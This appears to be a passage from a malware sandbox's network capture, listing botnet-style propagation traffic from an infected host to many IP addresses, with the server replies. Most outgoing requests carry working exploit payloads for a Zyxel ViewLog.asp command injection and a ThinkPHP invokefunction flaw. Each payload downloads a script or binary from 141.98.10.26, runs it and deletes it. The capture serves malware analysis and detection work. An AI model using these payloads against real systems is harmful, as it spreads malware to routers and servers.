Nov 22, 2023 08:39:11.624553919 CET	9918	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:20.583199024 CET	11068	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:40.292494059 CET	13379	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:17.151277065 CET	17831	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
467	192.168.2.23	55966	31.136.198.37	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:03.004154921 CET	8914	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.561613083 CET	9031	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:04.681433916 CET	9163	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:07.017111063 CET	9407	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:11.624553919 CET	9918	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:20.583199024 CET	11068	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:40.292494059 CET	13379	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:17.151258945 CET	17830	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
468	192.168.2.23	45228	85.16.69.36	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:03.108901978 CET	8929	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.468375921 CET	9027	IN	HTTP/1.1 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
469	192.168.2.23	38278	95.53.247.61	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:03.133235931 CET	8929	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
470	192.168.2.23	57626	94.110.185.58	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:03.193085909 CET	8931	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
471	192.168.2.23	45240	85.16.69.36	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:03.786062956 CET	9037	IN	HTTP/1.1 404 Not Found

Session ID	Source IP	Source Port	Destination IP	Destination Port
472	192.168.2.23	59346	112.78.159.12	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:04.423434019 CET	9155	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:04.818000078 CET	9167	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:04 GMT Date: Wed, 22 Nov 2023 07:39:04 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 39 66 34 65 37 30 26 23 34 36 3b 31 37 30 30 36 33 38 37 34 34 26 23 34 36 3b 61 34 65 30 35 65 66 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c9f4e70.1700638744.a4e05ef4</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
473	192.168.2.23	40398	31.200.115.245	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:04.631570101 CET	9160	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
474	192.168.2.23	39750	95.86.78.36	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:04.645111084 CET	9161	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
475	192.168.2.23	34636	62.29.77.225	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:04.872194052 CET	9168	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
476	192.168.2.23	55400	112.78.213.52	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:05.071024895 CET	9170	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:05.332704067 CET	9205	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:05 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
477	192.168.2.23	33144	94.125.123.4	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:05.632374048 CET	9280	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:05.849606991 CET	9286	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 22 Nov 2023 07:39:05 GMT Content-Type: text/html; charset=utf-8 Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
478	192.168.2.23	51984	94.122.106.147	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:05.640894890 CET	9281	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
479	192.168.2.23	44834	62.29.54.208	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:05.647902966 CET	9281	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
480	192.168.2.23	56638	95.86.81.98	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:06.117299080 CET	9290	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
481	192.168.2.23	50286	95.214.8.128	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:06.529655933 CET	9394	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:06.719958067 CET	9401	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:06 GMT Server: Apache/2.4.56 (Debian) Content-Length: 310 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 64 65 62 69 61 6e 31 31 2e 74 65 6d 70 6c 61 74 65 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at debian11.templates Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
482	192.168.2.23	52262	95.197.176.131	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:06.548295975 CET	9395	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:06.781116009 CET	9402	IN	HTTP/1.1 403 Forbidden
Nov 22, 2023 08:39:06.805989981 CET	9402	IN	Data Raw: 53 65 72 76 65 72 3a 20 61 6c 70 68 61 70 64 2f 32 2e 31 2e 38 0d 0a 44 61 74 65 3a 20 57 65 64 20 4e 6f 76 20 32 32 20 30 38 3a 33 39 3a 30 36 20 32 30 32 33 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e Data Ascii: Server: alphapd/2.1.8Date: Wed Nov 22 08:39:06 2023Pragma: no-cacheCache-Control: no-cacheContent-type: text/htmlContent-length: 62<html><body><h1>The request is forbidden.</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
483	192.168.2.23	46132	95.174.100.192	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:06.570944071 CET	9397	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:06.806013107 CET	9403	IN	HTTP/1.0 400 Bad Request Connection: Keep-Alive
Nov 22, 2023 08:39:06.806024075 CET	9403	IN	Data Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
484	192.168.2.23	54544	88.99.203.254	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:06.716522932 CET	9400	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
